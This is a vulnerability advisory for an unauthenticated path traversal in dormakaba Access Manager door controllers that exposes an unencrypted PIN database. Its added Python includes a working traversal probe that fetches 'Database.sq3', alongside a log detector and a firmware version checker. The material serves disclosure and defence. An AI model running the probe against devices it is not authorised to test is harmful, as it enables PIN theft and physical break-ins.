dormakaba Access Manager Unauthenticated Path Traversal Vulnerability Allowing Arbitrary File Access

Vulnerability

A path traversal vulnerability has been identified in the dormakaba Access Manager 9200-k5 and 9200-k7 hardware revisions running firmware older than the respective fixed versions. It allows an unauthenticated attacker to read files from the device's filesystem through crafted GET requests. Exploitation can expose sensitive data such as the SQLite database 'Database.sq3', which stores PIN codes unencrypted alongside other confidential data. Requesting certain files also crashes the web server, causing a denial-of-service condition that lasts approximately 60 seconds.

Impact

Successful exploitation gives an unauthenticated attacker read access to the device's filesystem, including PIN codes and configuration data. The same flaw can be used to crash the web server, making the Access Manager unreachable for about 60 seconds.

Reproduction

The vulnerability can be reproduced by sending a GET request whose path contains a traversal sequence pointing at the desired file. Because most HTTP clients normalise '../' segments out of a URL before sending it, the request must be issued with path handling disabled, for example with curl's '--path-as-is' option. To retrieve 'Database.sq3', the requested path consists of the traversal sequence '../../../../../' followed by the target file's location on the device.
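The following Python is an added example, not code from the advisory or from dormakaba. It builds the traversal request by hand and writes it straight to a socket, so no client-side path normalisation can strip the '../' sequence, then checks whether the returned body carries the SQLite 3 file header. It also includes a small access-log scan that flags traversal attempts, including URL-encoded ones, for teams hunting for exploitation of this issue. Assumptions not stated in the advisory: the web interface listens on TCP/80, and the directory that precedes 'Database.sq3' on the device is supplied by the caller in `target`; the log lines used are constructed.

```python
"""Traversal reproduction and detection helper (added example, not vendor code).

Most HTTP clients collapse '../' segments before the request leaves the
machine (curl needs --path-as-is to stop doing so). Writing the request
line to a socket by hand sidesteps that, so the sequence reaches the
device exactly as written.

Assumptions (not in the advisory): web UI on TCP/80; the on-device
directory that precedes 'Database.sq3' is passed by the caller in `target`.
"""
import socket
from urllib.parse import unquote

SQLITE_MAGIC = b"SQLite format 3\x00"   # first 16 bytes of every SQLite 3 file
TRAVERSAL = "../" * 5                   # the '../../../../../' sequence from the advisory


def build_traversal_request(host: str, target: str, traversal: str = TRAVERSAL) -> bytes:
    """Return a raw HTTP/1.1 GET whose path is the traversal sequence plus target.

    Nothing is normalised: these bytes are exactly what goes on the wire.
    """
    path = "/" + traversal + target.lstrip("/")
    request = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return request.encode("ascii")


def parse_response(raw: bytes) -> tuple[int, bytes]:
    """Split a raw HTTP response into (status code, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP response")
    status_line = head.split(b"\r\n", 1)[0]
    return int(status_line.split(b" ")[1]), body


def is_sqlite_database(body: bytes) -> bool:
    """True if the body starts with the SQLite 3 file header."""
    return body.startswith(SQLITE_MAGIC)


def probe(host: str, target: str, port: int = 80, timeout: float = 10.0) -> tuple[int, bool]:
    """Send the traversal request; return (status, body looks like SQLite).

    Network side effect: only run against a device you are authorised to test.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_traversal_request(host, target))
        chunks = []
        while True:
            chunk = sock.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    status, body = parse_response(b"".join(chunks))
    return status, is_sqlite_database(body)


def flag_traversal_requests(log_lines: list[str]) -> list[str]:
    """Return request lines from common/combined-format access logs whose
    path contains a '..' segment after URL-decoding ('%2e%2e%2f' included).

    Matching whole segments rather than the substring '..' avoids flagging
    legitimate names such as 'file..bak'.
    """
    flagged = []
    for line in log_lines:
        try:
            request_line = line.split('"')[1]
            path = request_line.split(" ")[1]
        except IndexError:
            continue
        decoded = unquote(unquote(path))          # also catches double encoding
        segments = decoded.split("?", 1)[0].split("/")
        if any(seg == ".." for seg in segments):
            flagged.append(request_line)
    return flagged


if __name__ == "__main__":
    # Constructed sample log lines, not real device logs.
    sample_log = [
        '10.0.0.5 - - [26/Jan/2026:10:40:00 +0000] "GET /index.html HTTP/1.1" 200 512',
        '10.0.0.9 - - [26/Jan/2026:10:41:07 +0000] "GET /../../../../../Database.sq3 HTTP/1.1" 200 40960',
        '10.0.0.9 - - [26/Jan/2026:10:41:09 +0000] "GET /%2e%2e%2f%2e%2e%2fDatabase.sq3 HTTP/1.1" 200 40960',
    ]
    for hit in flag_traversal_requests(sample_log):
        print("traversal attempt:", hit)
    print(build_traversal_request("192.0.2.10", "Database.sq3").decode())
```

`probe()` is the only function that touches the network; everything else can be exercised offline, which is how the log scan is meant to be used against exported access logs.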

Remediation

Users are advised to update to the latest firmware version. For Access Manager 9200-k5, this means updating to version 04.06.189 RA or later. For Access Manager 9200-k7, users should ensure they are on version 05.01.088 RA or later.
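As an added example (not dormakaba tooling), the Python below checks an inventory of Access Managers against the fixed versions named above. It compares versions numerically field by field, because a plain string comparison ranks '04.06.88' above '04.06.189' and would report a vulnerable 9200-k5 as fixed. The assumption that the trailing 'RA' token is a release tag that does not affect ordering is mine; the inventory rows are constructed.

```python
"""Firmware version check against the fixed versions in the advisory.

Added example, not vendor code. Assumption: the trailing ' RA' token is a
release tag that plays no part in ordering, so it is parsed off and ignored.
"""
import re

# Minimum fixed firmware per hardware revision, as given in the advisory.
FIXED_VERSIONS = {
    "9200-k5": "04.06.189 RA",
    "9200-k7": "05.01.088 RA",
}

_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)(?:\s+[A-Za-z]+)?\s*$")


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '04.06.189 RA' into (4, 6, 189); raise on anything unexpected."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised firmware version: {text!r}")
    return tuple(int(part) for part in m.groups())


def is_patched(model: str, installed: str) -> bool:
    """True if `installed` is at or above the fixed version for `model`."""
    try:
        minimum = FIXED_VERSIONS[model]
    except KeyError:
        raise ValueError(f"no fixed version known for model {model!r}") from None
    return parse_version(installed) >= parse_version(minimum)


def triage(inventory: list[tuple[str, str, str]]) -> list[tuple[str, str]]:
    """Return (hostname, reason) for every device that still needs attention.

    Rows are (hostname, model, installed firmware). Unknown models and
    unparseable versions are reported, not skipped: an unverified device
    is not a safe device.
    """
    findings = []
    for host, model, version in inventory:
        try:
            if not is_patched(model, version):
                findings.append((host, f"{model} on {version}, needs {FIXED_VERSIONS[model]}"))
        except ValueError as exc:
            findings.append((host, f"could not verify: {exc}"))
    return findings


if __name__ == "__main__":
    # Constructed inventory, not real device data.
    sample = [
        ("door-lobby", "9200-k5", "04.06.189 RA"),
        ("door-lab", "9200-k5", "04.06.88 RA"),
        ("door-dc", "9200-k7", "05.01.087 RA"),
        ("door-unknown", "9200-k9", "01.00.000 RA"),
    ]
    for host, reason in triage(sample):
        print(f"{host}: {reason}")
```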

Added: Jan 26, 2026, 10:40 AM
Updated: Jan 26, 2026, 3:48 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 5.0
exploitability: 7.7
remediation: 0.0
relevance: 2.4
threat: 1.6
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.